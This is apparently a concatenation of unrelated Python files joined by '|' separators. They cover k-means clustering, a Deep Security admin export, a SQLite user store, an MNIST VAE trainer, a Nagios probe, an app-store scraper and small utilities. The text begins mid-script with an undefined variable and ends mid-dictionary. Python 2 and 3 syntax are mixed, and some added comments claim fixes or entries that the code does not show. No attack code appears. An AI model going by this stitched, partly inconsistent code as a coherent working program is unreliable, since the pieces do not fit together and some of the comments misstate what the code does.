# k must be >= 1: the original started the range at 0, which KMeans rejects,
# and also produced 11 inertia values for a 10-point x axis in the plot.
for i in range(1, 11):
    kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10, random_state=0)
    kmeans.fit(X)
    wcss.append(kmeans.inertia_)
plt.plot(range(1, 11), wcss)
plt.title('The Elbow Method')
plt.xlabel('Number of Clusters')
plt.ylabel('WCSS')
plt.show()
## We can take k as 3 from the plot
# Applying k-means to the cars dataset
kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=300, n_init=10, random_state=0)
y_kmeans = kmeans.fit_predict(X)
# DataFrame.as_matrix() was removed from pandas; to_numpy() is the successor.
X = X.to_numpy()
## X is an array of data and y_kmeans is clusters 0, 1, 2
# scatter takes `s=` for marker size (`size=` is not a valid kwarg), and
# each cluster now gets a distinct colour so the legend is meaningful.
plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s=100, c='red', label='Toyota')
plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s=100, c='blue', label='Nissan')
plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s=100, c='green', label='Honda')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=300, c='yellow', label='Centroids')
plt.title('Clusters of car make')
plt.legend()
plt.show()
|
import json
import os
import sys
import warnings
import deepsecurity as api
from deepsecurity.rest import ApiException
from datetime import datetime
from pprint import pprint
def format_for_csv(line_item):
    """Join a list into one semicolon-separated line ending with a newline.

    The original docstring claimed comma separation while the code used
    ';'; the delimiter is unchanged, only the documentation is corrected.

    :param line_item: sequence of values to serialize (str() is applied).
    :return: "a;b;c\\n", or "" for an empty sequence (matching the original
        loop, which emitted nothing when given no items).
    """
    if not line_item:
        return ""
    # str.join replaces the original's manual index bookkeeping.
    return ";".join(str(item) for item in line_item) + "\n"
# Setup
if not sys.warnoptions:
    warnings.simplefilter("ignore")
# Get the DSM URL and API key from a JSON file
property_file = os.path.dirname(os.path.abspath(__file__)) + '/../properties.json'
with open(property_file) as raw_properties:
    properties = json.load(raw_properties)
secret_key = properties['secretkey']
url = properties['url']
api_version = 'v1'
# Add DSM host information to the API client configuration
configuration = api.Configuration()
configuration.host = url
configuration.api_key['api-secret-key'] = secret_key
# Initialization
# Set Any Required Values
api_instance = api.AdministratorsApi(api.ApiClient(configuration))
api_roles = api.AdministratorRolesApi(api.ApiClient(configuration))
# Add column titles to comma-separated values string
csv = "Username;Active;Last Sign in;Role\n"
try:
    # list all roles and store role names in dictionary with id as key
    roles = api_roles.list_administrator_roles(api_version)
    roles_dict = {}
    for role in roles.roles:
        roles_dict[role.id] = role.name
    # list all users on the system
    admins = api_instance.list_administrators(api_version)
    for admin in admins.administrators:
        module_info = []
        module_info.append(admin.username)
        module_info.append(admin.active)
        if admin.last_sign_in:
            # API reports epoch milliseconds; convert to ISO-8601.
            posix_time = int(admin.last_sign_in)/1000
            last_sign_in = datetime.fromtimestamp(posix_time).isoformat()
        else:
            last_sign_in = None
        module_info.append(last_sign_in)
        module_info.append(roles_dict[admin.role_id])
        # Add the module info to the CSV string
        csv += format_for_csv(module_info)
    # NOTE(review): "../outputoutput/" looks like a doubled path segment
    # (probably "../output/") -- confirm the intended output directory.
    with open("../outputoutput/users.csv", "w") as text_file:
        text_file.write(csv)
except ApiException as e:
    # NOTE(review): message misspells "Administrators" -- runtime string
    # left untouched here.
    print("An exception occurred when calling Administratiors..list_administrators: %s\n" % e)
|
from User import User
import random
class Users:
    """Repository of User records backed by a SQLite `users` table.

    The original also declared a useless class-level attribute
    (`database = ""`) that was always shadowed in __init__; it is removed.
    """

    def __init__(self, database):
        # Wrapper object exposing .cursor and .db (the connection).
        self.database = database

    def users(self):
        """Return every row of the users table as a list of User objects."""
        self.database.cursor.execute('''SELECT first_name, last_name, code FROM users''')
        rows = self.database.cursor.fetchall()
        result = []
        for first_name, last_name, code in rows:
            user = User()
            user.init(first_name, last_name, code)
            result.append(user)
        return result

    def usersearch_by_firstname(self, first_name):
        """All users whose first name matches exactly."""
        return [u for u in self.users() if u.first_name == first_name]

    def usersearch_by_lastname(self, last_name):
        """All users whose last name matches exactly."""
        return [u for u in self.users() if u.last_name == last_name]

    def usersearch_by_code(self, code):
        """The unique user holding this code, or False when absent.

        (Returns False rather than None to preserve the original API.)
        """
        for user in self.users():
            if user.code == code:
                return user
        return False

    def add_user(self, first_name, last_name):
        """Insert a new user with a random, currently-unused code."""
        code = random.randint(1, 1000)
        # Re-roll until free; usersearch_by_code is falsy (False) only when
        # no user holds the code, so truthiness replaces `!= False`.
        while self.usersearch_by_code(code):
            code = random.randint(1, 1000)
        self.database.cursor.execute('''INSERT INTO users(first_name, last_name, code)
        VALUES(?,?,?)''', (first_name, last_name, code))
        self.database.db.commit()

    def remove_user(self, user):
        """Delete the row matching this user's code."""
        self.database.cursor.execute('''DELETE FROM users WHERE code = ? ''', (user.code,))
        self.database.db.commit()
#! /usr/bin/python
# Call form works under both Python 2 and 3 for a single argument; the
# original Python 2 print *statement* is a SyntaxError on Python 3.
print("I want to buy a new better keyboard,but my wife won't agree with it.")
|
import os
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from PIL import Image
from torch.utils.data import DataLoader, Dataset
from torchvision.datasets import MNIST
from torchvision.transforms import ToTensor
from squib.updaters.updater import StanderdUpdater
from squib.trainer.trainer import Trainer
# Dimensionality of the VAE latent space, shared by Encoder and Decoder.
latent_dim = 20
class Encoder(nn.Module):
    """Maps a flattened 28x28 image to the (mean, log-std) of a diagonal
    Gaussian over the latent space."""

    def __init__(self):
        super(Encoder, self).__init__()
        self.mlp = nn.Sequential(
            nn.Linear(784, 400),
            nn.ReLU(inplace=True),
            nn.Linear(400, latent_dim * 2),
        )

    def forward(self, x):
        flat = x.reshape(-1, 784)
        params = self.mlp(flat)
        # First half of the features is the mean, second half the log-std.
        mean, log_std = torch.chunk(params, chunks=2, dim=1)
        return mean, log_std
class Decoder(nn.Module):
    """Samples z ~ N(mean, exp(log_std)) via the reparameterization trick
    and decodes z into a 1x28x28 image in [0, 1]."""

    def __init__(self):
        super(Decoder, self).__init__()
        self.mlp = nn.Sequential(
            nn.Linear(latent_dim, 400),
            nn.ReLU(inplace=True),
            nn.Linear(400, 784),
            nn.Sigmoid(),
        )

    def forward(self, mean, log_std):
        # Reparameterization: z = mean + std * eps with eps ~ N(0, I).
        std = torch.exp(log_std)
        noise = torch.randn_like(std)
        z = mean + std * noise
        decoded = self.mlp(z)
        return decoded.reshape(-1, 1, 28, 28)
def VAEUpdater(encoder, decoder, optimizer=None, tag=None) -> StanderdUpdater:
    """Build a StanderdUpdater computing the VAE loss (reconstruction + KL).

    :param encoder: maps images to (mean, log_std).
    :param decoder: reparameterizes and reconstructs images.
    :param optimizer: when None the updater runs in eval mode (validation).
    :param tag: metric-name prefix used by the trainer.
    """
    bce = nn.BCELoss()
    # Negative KL divergence of N(mean, std) from N(0, I), with l = log std:
    #   -KL = 0.5 * mean(1 + 2*l - mean^2 - exp(l)^2)
    # The original wrote 0.5*l where the log-variance term 2*l belongs
    # (log sigma^2 = 2*log_std), under-weighting the entropy term.
    kld = lambda m, l: 0.5 * torch.mean(1 + 2*l - m.pow(2) - l.exp().pow(2))

    def _loss_func(x, _):
        # Validation updaters (no optimizer) must not update BN/dropout state.
        if optimizer is None:
            encoder.eval()
            decoder.eval()
        else:
            encoder.train()
            decoder.train()
        mean, log_std = encoder(x)
        y = decoder(mean, log_std)
        loss_bce = bce(y, x.detach())
        loss_kld = kld(mean, log_std)
        # kld is the *negative* KL, so subtracting it adds the KL penalty.
        loss = loss_bce - loss_kld
        result = {
            'bce': loss_bce.item(),
            'kld': loss_kld.item(),
        }
        return loss, result

    upd = StanderdUpdater(loss_func=_loss_func,
                          optimizer=optimizer,
                          tag=tag)
    return upd
def example(encoder :Encoder,
            decoder :Decoder,
            validation_set:Dataset,
            save_to :str,
            device :torch.device):
    """Return a callback that writes example PNGs for the first 8 validation
    images: `<i>_reconstructed.png` (encode->decode round trip) and
    `<i>_generated.png` (decoded from a latent sample), saved under save_to.
    """
    n_img = 8
    validation_imgs = torch.stack([validation_set[i][0] for i in range(n_img)])
    if not os.path.exists(save_to):
        os.mkdir(save_to)
    def _func():
        with torch.no_grad():
            input_img = validation_imgs.to(device)
            # NOTE(review): `std` (ones) is passed as the decoder's *log_std*
            # argument, so sampling uses std = e^1, not 1 -- confirm whether
            # torch.zeros was intended for the second tensor.
            mean = torch.zeros((8, latent_dim), dtype=torch.float32, device=device)
            std = torch.ones ((8, latent_dim), dtype=torch.float32, device=device)
            reconstructed = decoder(*encoder(input_img))*255
            generated = decoder(mean, std)*255
            reconstructed = reconstructed.detach().cpu().numpy()
            generated = generated .detach().cpu().numpy()
            name = ['_reconstructed.png', '_generated.png']
            for j, rg in enumerate(zip(reconstructed, generated)):
                for n, i in zip(name, rg):
                    path = os.path.join(save_to, str(j)+n)
                    # Scale to 0-255 grayscale bytes for PIL.
                    img = i.reshape(28, 28).astype(np.uint8)
                    img = Image.fromarray(img)
                    img.save(path)
    return _func
def main():
    """Train the MNIST VAE: build datasets/loaders, models, updaters, and the
    trainer with logging, evaluation, checkpointing, and example dumps."""
    trainset = MNIST(root='./mnist',
                     train=True,
                     download=True,
                     transform=ToTensor())  # ToTensor scales pixels to [0, 1] for BCE
    validationset = MNIST(root='./mnist',
                          train=False,
                          download=True,
                          transform=ToTensor())
    train_loader = DataLoader(trainset,
                              batch_size=128,
                              shuffle=True,
                              num_workers=2)
    validation_loader = DataLoader(validationset,
                                   batch_size=128,
                                   shuffle=False,
                                   num_workers=2)

    # NOTE: hard-coded to the first GPU; fails on CPU-only machines.
    device = torch.device('cuda:0')

    enc = Encoder()
    dec = Decoder()
    # One optimizer over both models, as VAEUpdater computes a joint loss.
    opt = optim.Adam(list(enc.parameters()) + list(dec.parameters()), lr=1e-4)
    enc.to(device)
    dec.to(device)

    # 'tr' updater trains; 'vl' updater (no optimizer) only evaluates.
    train_updater = VAEUpdater(enc, dec, tag='tr', optimizer=opt)
    validation_updater = VAEUpdater(enc, dec, tag='vl')

    trainer = Trainer(loader=train_loader,
                      updater=train_updater,
                      device=device,
                      save_to='./result')
    trainer.log_report(keys=['tr/bce', 'vl/bce', 'tr/kld', 'vl/kld'],
                       plots={
                           'bce.png': ['tr/bce', 'vl/bce'],
                           'kld.png': ['tr/kld', 'vl/kld']
                       },
                       trigger=(1, 'epoch'))
    trainer.add_evaluation(loader=validation_loader,
                           updater=validation_updater,
                           trigger=(1, 'epoch'))
    # Per-epoch checkpoints of both networks, plus a resumable trainer state.
    trainer.save_model(path='models/encoder_{epoch}.pth',
                       model=enc,
                       trigger=(1, 'epoch'))
    trainer.save_model(path='models/decoder_{epoch}.pth',
                       model=dec,
                       trigger=(1, 'epoch'))
    trainer.save_trainer(path='trainer.pth',
                         models={'encoder': enc, 'decoder': dec, 'opt': opt},
                         trigger=(1, 'epoch'))
    # Dump reconstruction/sample images every epoch.
    trainer.add_event(example(enc, dec, validationset, './example', device),
                      trigger=(1, 'epoch'))
    trainer.run()

if __name__ == "__main__":
    main()
|
import time,datetime
class InsuranceTime:
    """Helpers for building policy start/end timestamps relative to today."""

    def nowtime(self):
        """Return today's date as a datetime.date."""
        return datetime.date.today()

    def policyBeginDate(self, day):
        """Timestamp for `day` days from today, at the first second of the day."""
        target = self.nowtime() + datetime.timedelta(days=day)
        return "%s 00:00:00" % target

    def policyEndDate(self, day):
        """Timestamp for `day` days from today, at the last second of the day."""
        target = self.nowtime() + datetime.timedelta(days=day)
        return "%s 23:59:59" % target
if __name__ == '__main__':
    # Demo (Python 2 print statements): today's date and sample policy
    # start/end timestamps one day and one year out.
    policyDate=InsuranceTime()
    print policyDate.nowtime()
    print policyDate.policyBeginDate(1)
    print policyDate.policyEndDate(365)
#!/usr/bin/env python
from useless.decorators import extends
__author__ = 'Ronie Martinez'
class Base1(object):
    """Wraps a value; `double` yields twice the stored value."""

    def __init__(self, value):
        self.value = value

    def double(self):
        """Return the stored value times two."""
        doubled = 2 * self.value
        return doubled
class Base2(object):
    """Wraps a value; note its `double` actually quadruples (kept as-is)."""

    def __init__(self, value):
        self.value = value

    def double(self):
        """Return the stored value times four (name kept from the original)."""
        return 4 * self.value

    def triple(self):
        """Return the stored value times three."""
        return 3 * self.value
# Warning! Read UPWARDS: Base1 is applied first before Base2... and so on...
@extends(Base2)
@extends(Base1)
class Derived2(object):
    # Empty body: all behavior is grafted on by `extends` (from the project's
    # useless.decorators). Base1 is applied first, so its double() wins and
    # Base2 only contributes triple() -- consistent with the prints below.
    pass

d2 = Derived2(10)
print d2.double() # prints 20
print d2.triple() # prints 30
|
"""
This part generates the results, it launches an small interfase where the user has to write 1 to display results or q to quit.
Once all is launched, it returns to the menu.
Exception handling and input validation is done for each part.
IMPORTANT : The input MUST be in the same directory as this .py file
"""
__author__ = 'lqo202'
import Clean_DB as clean
import Grade as g
import pandas as pd
from matplotlib import pyplot as plt
##### Previous functions to validate input, handle exceptions and launch the result####
def printingresults1(grades_db):
    """Print the score and show a plot for each boro in grades_db.

    grades_db is a project Grade object wrapping a DataFrame with a BORO
    column plus test_restaurant_in_boro/plot_by_boro methods.
    """
    print 'Grades of restaurants by boro:'
    try:
        for boro in list(grades_db.BORO.unique()):
            filtered = grades_db[grades_db['BORO']==boro]
            #Results of scores
            total = filtered.test_restaurant_in_boro(boro)
            print "Score in %s is %i" %(boro, total)
            #Plot
            filtered.plot_by_boro(boro)
            # Tell the user to close the window, except after the last boro.
            if boro != list(grades_db.BORO.unique())[-1]:
                print "Close window to continue displaying"
            plt.show()
    # Broad per-category handlers: each failure mode just reports and returns.
    except ValueError:
        print "Oops! That was no valid input. Try again!"
    except ArithmeticError:
        print 'ArithmeticError ocurred in boros'
    except LookupError:
        print 'LookupError ocurred in boros'
    except AttributeError:
        print 'Attribute error in boros'
    except TypeError:
        print 'Type Error in boros'
def printingresults2(data):
    """Plot the city-wide grade evolution, then delegate to the per-boro
    results (printingresults1)."""
    print 'Results for NYC, processing...'
    try:
        #Plotting
        graph = data.plot_by_boro()
        plt.show()
        print 'Showing and saving graph of evolution of grades in restaurants in NYC'
        #Calling results by boro
        printingresults1(data)
    except KeyboardInterrupt:
        print 'Keyboard interrupted, try again!'
    except ArithmeticError:
        print 'ArithmeticError ocurred results NY'
    except LookupError:
        print 'LookupError ocurred results NY'
    except ValueError:
        print 'Value error ocurred in results BY'
########### Importing the DB ############
def import_data(file="DOHMH_New_York_City_Restaurant_Inspection_Results.csv"):
    """Load the NYC restaurant-inspection CSV, keeping only the columns the
    app uses, all read as strings (types per the dataset's documentation)."""
    wanted = ['CAMIS', 'BORO', 'GRADE', 'GRADE DATE']
    as_text = {column: str for column in wanted}
    return pd.read_csv(file, usecols=wanted, dtype=as_text)
############## Final screening of results #########
def mainwindow():
    """Menu loop: '1' runs the clean/grade/plot pipeline, 'q' quits."""
    print 'Restaurants in NYC info: Assignment 10 - Programming for Data Science'
    while True:
        try:
            optionuser = raw_input('Menu: Press 1 to start showing some plots and results, q for exit :')
            if optionuser == 'q': break
            else:
                if int(optionuser) == 1:
                    ratings = import_data()
                    #Creating CleanDB object and cleaning
                    ratings_db = clean.clean_DB(ratings)
                    rating_clean = ratings_db.clean_all()
                    #Creating grades object
                    grades_db = g.grades(rating_clean)
                    print "Data was cleaned! Processing ..."
                    #Calling NYC results
                    printingresults2(grades_db)
                else:
                    print "That option was not valid, try again!"
        except ValueError:
            # int(optionuser) failed: non-numeric input other than 'q'.
            print "Oops! That was no valid input. Try again with a number!"
        except KeyboardInterrupt:
            print 'Keyboard interrupted, try again!'
        except IOError:
            # import_data() could not open the CSV file.
            print 'File not found!'

if __name__ == "__main__":
    try:
        mainwindow()
    except EOFError:
        # Stdin closed (e.g. piped input exhausted): exit quietly.
        pass
|
#############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2006-2010.
# See http://www.eu-egee.org/partners/ for details on the copyright holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Joel Casutt - joel.casutt@switch.ch
# Minor modifications:
# Henri Mikkonen - henri.mikkonen@hip.fi
#############################################################################
'''
Created on 4/jan/2012
@author: joelcasutt
'''
from AbstractProbe import PsudonymityAbstractProbe
from HTTPSHandler import HTTPSClientAuthenticationHandler
from urllib2 import HTTPError, URLError
import urllib2
class PseudonymityProbe( PseudonymityAbstractProbe ):
    # NOTE(review): the import above brings in `PsudonymityAbstractProbe`
    # (missing an "e"), while this base is spelled `PseudonymityAbstractProbe`;
    # one of the two spellings must be wrong -- confirm against AbstractProbe.py,
    # otherwise this module raises NameError at class-definition time.
    def __init__( self, serviceName, clientAuth ):
        super(PseudonymityProbe, self).__init__(serviceName, clientAuth)

    """
    return the status dictionary
    """
    def getStatus( self ):
        """Fetch self.url and parse "key: value" lines into a status dict.

        Exits via nagios_critical on connection errors or unparsable lines.
        """
        # With client auth enabled, install an opener that presents the
        # configured key/cert (both checked for existence first).
        if self.isHTTPSClientAuthNenabled():
            self.file_exists(self.options.key)
            self.file_exists(self.options.cert)
            cert_handler = HTTPSClientAuthenticationHandler(key=self.options.key,
                                                            cert=self.options.cert,
                                                            timeout=self.options.timeout)
            opener = urllib2.build_opener(cert_handler)
            urllib2.install_opener(opener)
        try:
            if self.options.verbose:
                print "Contacting %s..." % self.url
            f = urllib2.urlopen(self.url)
        except HTTPError, e:
            self.nagios_critical("Error: %s: %s" % (self.url, e))
        except URLError, e:
            self.nagios_critical("Error: %s: %s" % (self.url, e))
        status = dict()
        # Each response line is expected to look like "key: value".
        for line in f:
            try:
                (key, value) = line.rsplit('\n')[0].split(": ")
                status[key] = value
            except ValueError, e:
                self.nagios_critical("CRITICAL: Status not found from the response")
        return status

    def getPickleFile( self ):
        # This probe keeps no state between runs.
        print "no pickle-file needed for this service (Status)"

    """
    Exits with NAGIOS_CRITICAL if file doesn't exist or is not readable
    """
    def file_exists(self, file):
        try:
            open(file, "r")
        except IOError, e:
            self.nagios_critical(e)
|
class EnglishLength:
    """An English length normalized to yards/feet/inches (3 ft = 1 yd, 12 in = 1 ft)."""

    def __init__(self, yards=0, feet=0, inches=0):
        """Normalize via total inches so carries propagate inches -> feet -> yards.

        (The previous version added feet//3 to yards BEFORE folding the inches
        carry into feet, so e.g. feet=2, inches=24 silently lost a yard.)
        """
        total = 36 * yards + 12 * feet + inches
        self.__yards = total // 36
        self.__feets = (total % 36) // 12
        self.__inches = total % 12

    def __add__(self, other):
        """Component-wise sum, preserving the original (inches, yards, feet)
        tuple order (the result itself is not re-normalized)."""
        return (self.__inches + other.__inches,
                self.__yards + other.__yards,
                self.__feets + other.__feets)
test1 = EnglishLength(25,15,14)
test2 = EnglishLength(30,15,14)
# Prints the component-wise sum as an (inches, yards, feet) tuple.
print(test1.__add__(test2))
|
import doctest
import unittest
from zeam.form.ztk.testing import FunctionalLayer
def test_suite():
    """Assemble a functional doctest suite from the widget .txt doc files."""
    flags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
    shared_globs = {}  # one globs dict shared by every doc file
    doc_files = (
        'bool.txt', 'choice.txt', 'collection_set.txt',
        'collection_list.txt', 'collection_object.txt',
        'multichoice.txt', 'object.txt', 'date.txt',
        'radio.txt', 'uri.txt', 'text.txt', 'time.txt',
        'currency.txt', 'number.txt',
    )
    suite = unittest.TestSuite()
    for doc_file in doc_files:
        doc_suite = doctest.DocFileSuite(
            doc_file,
            optionflags=flags,
            globs=shared_globs)
        doc_suite.layer = FunctionalLayer  # run under the functional test layer
        suite.addTest(doc_suite)
    return suite
|
import sys
import itertools
from tree import binary_tree
from collections import deque
#input params
input_list = [-3, -2, 1, 9, 5, -1, 11];
#input_list = [2, 1, 3];
tree = binary_tree(input_list);
print("LEVELS OF OUR TREE:");
tree.print_tree();
print("");
'''
SOLUTION: note that -
*everything on the same level can be added in ANY ORDER
*every level should be added in ASCENDING ORDER
'''
#make a list of nodes on same level using BFS
# node_list is the BFS frontier; None is a sentinel marking the end of a level.
node_list = deque([tree.root, None]);
counter = tree.give_height()+1;   # number of levels still to collect
final_list = [];                  # list of levels, each a list of node values
print_list = [];                  # values collected for the current level
while(counter and tree.root and node_list):
    element = node_list.popleft();
    if (not element):
        # Level finished: store it, reset, and re-arm the sentinel.
        final_list.append(print_list);
        print_list = [];
        node_list.append(None);
        counter -= 1;
        continue;
    print_list.append(element.value);
    # element.prev/element.next are presumably the left/right children --
    # confirm against the project's tree module.
    add_list = [element.prev, element.next];
    add_list = [element for element in add_list if element];
    node_list.extend(add_list);

#create all possible permutations at each level
final_list = [ list(itertools.permutations(element)) for element in final_list ];
#use backtracking to print all possibilities (NOTE: for efficiency, you can use a dynamically created for-loop)
def backtrack(input_list):
    """Print every interleaving built from one permutation per tree level.

    `input_list` accumulates the chosen permutation (a tuple) for each level
    processed so far; `final_list` supplies the candidates per level.
    """
    if len(input_list) == len(final_list):
        # One permutation chosen per level: flatten and print the solution.
        flattened = [value for level in input_list for value in level]
        print(flattened)
        return
    # Otherwise, try each permutation of the next level and recurse.
    for candidate in final_list[len(input_list)]:
        input_list.append(candidate)
        backtrack(input_list)
        input_list.pop()
#execute the backtracking method
# Starts with an empty selection; backtrack prints each full interleaving.
print("ALL THE POSSIBILITES ARE: ");
backtrack([]);
|
# Add a Secret Key, and info from Facebook, Google, and GitHub.
# Social Logins won't work without your IDs and Secrets added.
# NOTE: these are placeholder development values -- real credentials should
# come from the environment or an untracked instance config, never from
# version control.
SECRET_KEY = 'development key'
FB_APP_ID = 'Facebook App ID'
FB_APP_SECRET = 'Facebook App Secret'
GOOGLE_CLIENT_ID = 'Google Client Id'
GOOGLE_CLIENT_SECRET = 'Google Client Secret'
GITHUB_CLIENT_ID = 'GitHub Client ID'
GITHUB_CLIENT_SECRET = 'GitHub Client Secret'
# SQLite database relative to the app package, inside instance/.
SQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/course_catalog.db'
|
#!/usr/bin/env
# -*- coding: utf-8 -*-
__author__ = 'Vmture'
from com.common import CommonFunction
from com.re_rules import xiaomi_rules, message_kinds_xiaomi
import time
import re
com = CommonFunction()
name = '小米'
def get_update_messages():
    """Scrape the cached Xiaomi app page for update metadata.

    Returns (update_messages, download_url) where update_messages is
    [timestamp, size, version, update-date, package-name, appid, changelog].
    """
    update_datas = ''
    update_messages = [str(time.ctime())]
    datas = com.get_tmp_contents(name)
    # Locate the two anchor sections of the cached page ('定位_a'/'定位_b' rules).
    for data in datas:
        if re.compile(xiaomi_rules['定位_a']).search(data):
            contents_a = com.re_find_messages(xiaomi_rules['定位_a'], data)
            number = datas.index(data)  # index of the chunk holding section a
        if re.compile(xiaomi_rules['定位_b']).search(data):
            contents_b = com.re_find_messages(xiaomi_rules['定位_b'], data)
    # NOTE(review): contents_a/contents_b/number stay unbound if the rules
    # never match, which would raise NameError below -- confirm the cached
    # page format is guaranteed.
    # App size
    update_messages.append(com.re_find_messages(xiaomi_rules['软件大小'], contents_a))
    # Version number
    update_messages.append(com.re_find_messages(xiaomi_rules['版本号'], contents_a))
    # Update date
    update_messages.append(com.re_find_messages(xiaomi_rules['更新时间'], contents_a))
    # Package name
    update_messages.append(com.re_find_messages(xiaomi_rules['包名'], contents_a))
    # App id
    update_messages.append(com.re_find_messages(xiaomi_rules['appid'], contents_a))
    # Download URL (site-relative path prefixed with the host)
    download_url = 'http://app.mi.com' + com.re_find_messages(xiaomi_rules['下载地址'], datas[number])
    # Changelog: join all "new features" entries after the first.
    update_datas_list = re.compile(xiaomi_rules['新版特性']).findall(contents_b)
    for data in update_datas_list[1:]:
        update_datas += data+'; '
    update_messages.append(update_datas)
    return update_messages, download_url
def run():
    """Download the store page for `name`, extract the update info, and hand
    both to the shared pipeline; returns (path, end) from com.run_b."""
    url = com.find_url(name)
    header = com.find_header(name)
    # Caches the page to disk for get_update_messages() to read.
    com.get_page_source_requests(url, name, header)
    last_messages, download_url = get_update_messages()
    path, end = com.run_b(name, last_messages, download_url, message_kinds_xiaomi)
    return path, end

if __name__ == '__main__':
    a, b = run()
    print(a)
    print(b)
"""ICMPv4 Objects Class."""
from fmcapi.api_objects.apiclasstemplate import APIClassTemplate
import logging
import warnings
class ICMPv4Objects(APIClassTemplate):
    """The ICMPv4Objects Object in the FMC."""

    # JSON fields the FMC API accepts for this object type.
    VALID_JSON_DATA = [
        "id",
        "name",
        "type",
        "overrideTargetId",
        "code",
        "icmpType",
        "overrides",
        "overridable",
    ]
    VALID_FOR_KWARGS = VALID_JSON_DATA + []
    URL_SUFFIX = "/object/icmpv4objects"
    VALID_CHARACTERS_FOR_NAME = """[.\w\d_\- ]"""

    def __init__(self, fmc, **kwargs):
        """
        Initialize ICMPv4Objects object.

        Set self.type to "ICMPV4Object" and parse the kwargs.

        :param fmc: (object) FMC object
        :param kwargs: Any other values passed during instantiation.
        :return: None
        """
        super().__init__(fmc, **kwargs)
        logging.debug("In __init__() for ICMPv4Objects class.")
        self.parse_kwargs(**kwargs)
        # Assigned AFTER parse_kwargs, so it overrides any `type` kwarg.
        # NOTE(review): value is "ICMPV4Object" (capital V) while the docstring
        # says "ICMPv4Object" -- confirm which spelling the FMC API expects.
        self.type = "ICMPV4Object"
class ICMPv4Object(ICMPv4Objects):
    """
    Dispose of this Class after 20210101.

    Use ICMPv4Objects() instead.
    """

    def __init__(self, fmc, **kwargs):
        # Deprecated alias: emit a warning on every instantiation, then
        # behave exactly like ICMPv4Objects.
        warnings.resetwarnings()
        warnings.warn(
            "Deprecated: ICMPv4Object() should be called via ICMPv4Objects()."
        )
        super().__init__(fmc, **kwargs)
|
import logging
import logging.handlers
# Named logger writing "[LEVEL] (file:line) > message" records to ./log.txt.
log = logging.getLogger('myLogger')
log.setLevel(logging.INFO)  # INFO and above; DEBUG records are filtered out
formatter = logging.Formatter('[%(levelname)s] (%(filename)s:%(lineno)d) > %(message)s')
fileHandler = logging.FileHandler('./log.txt')
fileHandler.setFormatter(formatter)
log.addHandler(fileHandler)

if __name__ == '__main__':
    log.debug('debug')  # suppressed: below the INFO level set above
    log.info('info')
#!/usr/bin/env python
"""
Truncates the first and last a,b tokens from each line,
where a,b are arguments from sys.argv.
(The truncate_char.py on the other hand, truncates individual characters)
Strings are split into "tokens" use white-space as a delimiter.
"""
import sys
def main():
    """Filter stdin to stdout, dropping the first/last N whitespace tokens
    of each line.

    argv[1] is the number of leading tokens to drop; optional argv[2] is the
    number of trailing tokens (defaults to argv[1]). Lines with too few
    tokens become empty lines.
    """
    if len(sys.argv) <= 1:
        sys.stderr.write('Error: expected the number of truncations as an argument\n')
        # Previously fell through and crashed below with an IndexError.
        sys.exit(1)
    truncate_a = int(sys.argv[1])
    truncate_b = int(sys.argv[2]) if len(sys.argv) >= 3 else truncate_a
    for line in sys.stdin:
        tokens = line.strip().split()
        # Compare against the TOKEN count. (The old code compared against the
        # CHARACTER count, so e.g. 3 long tokens with truncate_b=4 sliced with
        # a negative index and wrongly kept tokens instead of dropping all.)
        if len(tokens) > truncate_a + truncate_b:
            kept = tokens[truncate_a:len(tokens) - truncate_b]
        else:
            kept = []
        sys.stdout.write(' '.join(kept))
        sys.stdout.write('\n')

if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
import sys
sys.path.append('../../python')
import inject
import logging
from model.config import Config

''' configuro el injector con las variables apropiadas '''
# (Configure the dependency injector with the appropriate bindings.)
def config_injector(binder):
    # Bind the Config type to a concrete instance loaded from the firmware
    # config file, so injected consumers share one configuration.
    binder.bind(Config, Config('firmware-config.cfg'))

# Wire the injector BEFORE importing modules that resolve Config on import.
inject.configure(config_injector)

import camabio
from firmware import Firmware
# from network import websocket

logging.getLogger().setLevel(logging.DEBUG)
from autobahn.asyncio.wamp import ApplicationSession
from asyncio import coroutine
class WampMain(ApplicationSession):
    """WAMP session that repeatedly invokes the firmware-identify RPC."""

    def __init__(self, config=None):
        logging.debug('instanciando wampSinchronizer')
        ApplicationSession.__init__(self, config)

    @coroutine
    def onJoin(self, details):
        """Once joined, loop forever calling assistance.firmware.identify."""
        logging.debug('session joined')
        # NOTE(review): there is no delay between iterations -- if the call
        # returns (or raises) quickly this loop hammers the router; confirm
        # whether a sleep/backoff is needed.
        while True:
            try:
                logging.info('identificando')
                yield from self.call('assistance.firmware.identify')
            except Exception as e:
                # Log and keep looping; the session itself stays up.
                logging.exception(e)
if __name__ == '__main__':
    # from autobahn.twisted.wamp import ApplicationRunner
    from autobahn.asyncio.wamp import ApplicationRunner
    from network.wampFirmware import WampFirmware
    # Connect to the local router on realm 'assistance' with full WAMP
    # debugging enabled, and run the session until interrupted.
    runner = ApplicationRunner(url='ws://localhost:8000/ws', realm='assistance', debug=True, debug_wamp=True, debug_app=True)
    runner.run(WampMain)
|
from django.contrib import admin
# Register your models here.
from .models import Bid, Category, Comment, Listing, User, Watchlist
# Expose every auction model in the Django admin site
# (registration order matches the original file).
for model in (Category, Listing, Bid, User, Watchlist, Comment):
    admin.site.register(model)
|
"""
dictionary.py
NFL Head Coaches
"""
import sys
# NFL head coaches by team (2017 season).
# Fixed misspelled team/coach names (e.g. "Carolina Pathers", "Seatle
# Seahawks", "Sean McDermot") and added the missing Dallas Cowboys entry,
# so lookups with the correct spellings succeed.
coaches = {
    "Arizona Cardinals": "Bruce Arians",
